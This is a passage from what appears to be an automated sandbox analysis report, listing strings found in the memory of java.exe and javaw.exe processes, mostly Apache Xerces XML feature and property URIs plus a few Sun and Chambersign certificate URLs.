          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsng
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/standard-uri-conformant2
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/standard-uri-conformantZ
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validate-annotations
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validate-annotations;c
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validate-annotationsitera
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees#
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees1
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesS
          Source: java.exe, 0000000A.00000003.410458502.0000000014C3B000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesap1
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/dynamic
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/dynamic3
          Source: java.exe, 0000000A.00000003.410458502.0000000014C3B000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/dynamicperty;
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking=
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingSi=
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvik
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultA
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultC
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueB
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueeDefiniB
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schemaK~
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef#5
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefttp://D
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefdom/:
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefk
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefs
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef-node-
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language3
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-languageS
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude1
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/D
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node#
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node9
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
          Source: javaw.exe, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-nameC?
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/input-buffer-size
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/input-buffer-sizes
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryK
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factorys
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scanner/apach7
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scannerKS
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor5
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-processorg5
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerk
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerl.o8
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager3
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver7
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolvers
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolvert
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-handler
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-handler6
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporterSE
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool3d
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool6
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-bindern
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-context#9
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-context:
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-contextc
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver=
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/symbol-tableQ
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation-manageron
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory7
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory;
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factorypt7
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd:
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/dtda:
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/schema#8
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/schemaren
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler9
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handlere
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/locale
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/localeJ
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/localeoJ
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/s/dom/iD
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationler
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation(
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationso
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/security-manager
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/security-manager8
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/security-manager:
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/security-managerk
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes#
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypesrg/w3c
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypesxerces
          Source: java.exe, 00000002.00000002.333098127.000000000531A000.00000004.00000001.sdmp, java.exe, 00000002.00000002.333182589.000000000A3C4000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.592486010.0000000009F91000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592199343.0000000009B8A000.00000004.00000001.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
          Source: javaw.exe, 00000009.00000002.592845354.000000000A0FF000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl
